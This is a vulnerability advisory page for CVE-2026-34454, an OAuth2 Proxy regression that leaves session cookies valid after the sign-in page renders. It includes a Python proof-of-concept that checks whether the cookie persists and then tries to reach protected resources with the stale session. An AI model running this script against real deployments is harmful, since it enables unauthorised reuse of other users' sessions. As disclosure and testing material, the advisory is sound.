Security Vulnerability Report
CVE-2026-34454 CVSS 3.5 LOW

CVE-2026-34454

Published: 2026-04-14 23:16:28
Last Modified: 2026-04-23 14:15:40

Description

OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. A regression introduced in 7.11.0 prevents OAuth2 Proxy from clearing the session cookie when rendering the sign-in page. In deployments that rely on the sign-in page as part of their logout flow, a user may be shown the sign-in page while the existing session cookie remains valid, meaning the browser session is not actually logged out. On shared workstations or devices, a subsequent user could continue to use the previous user's authenticated session. Deployments that use a dedicated logout/sign-out endpoint to terminate sessions are not affected. This issue is fixed in 7.15.2.

CVSS Details

CVSS Score
3.5 (Exploitability 0.9, Impact 2.5)
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Attack Vector: Physical; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Unchanged; Confidentiality: Low; Integrity: Low; Availability: None

Configurations (Affected Products)

cpe:2.3:a:oauth2_proxy_project:oauth2_proxy:*:*:*:*:*:*:*:* - VULNERABLE
OAuth2 Proxy >= 7.11.0, < 7.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration (placeholder host, as in the original PoC)
target_url = "https://target-oauth2-proxy.com/"
sign_in_url = "https://target-oauth2-proxy.com/oauth2/sign_in"

# Create a session to simulate a browser
session = requests.Session()

# Step 1: Simulate a session that a user left behind.
# In a real scenario, this cookie is obtained after authentication.
session.cookies.set("_oauth2_proxy", "VALID_SESSION_COOKIE_TOKEN_HERE")

print("[*] Simulating user logout by visiting sign-in page...")

# Step 2: Trigger the logout flow (rendering the sign-in page).
# A patched proxy answers with a Set-Cookie header that expires
# _oauth2_proxy; an affected build (>= 7.11.0, < 7.15.2) leaves it untouched.
response = session.get(sign_in_url)
print(f"[*] Sign-in page returned HTTP {response.status_code}")

# Step 3: Check if the session cookie persists after logout.
# requests drops a cookie from its jar when the server expires it,
# so the cookie still being present means the server never cleared it.
remaining_cookie = session.cookies.get("_oauth2_proxy")
if remaining_cookie:
    print("[+] Vulnerability Confirmed: Session cookie was NOT cleared.")
    print(f"[+] Cookie Value: {remaining_cookie}")
    print("[+] A subsequent user on this workstation can still access the session.")

    # Verify access without following redirects: an unauthenticated request
    # is redirected to the sign-in page, which itself returns 200, so
    # following redirects would make a dead session look alive.
    verify_resp = session.get(target_url, allow_redirects=False)
    if verify_resp.status_code == 200:
        print("[+] Successfully accessed protected resource using the stale session.")
    else:
        print(f"[-] Stale cookie was rejected upstream (HTTP {verify_resp.status_code}).")
else:
    print("[-] Session cookie cleared. System patched or using dedicated logout endpoint.")
```

References

https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2 (Vendor Advisory)
https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-f24x-5g9q-753f (Release Notes)

Weaknesses

CWE-384 (Session Fixation)
CWE-613 (Insufficient Session Expiration)

NVD Status: Analyzed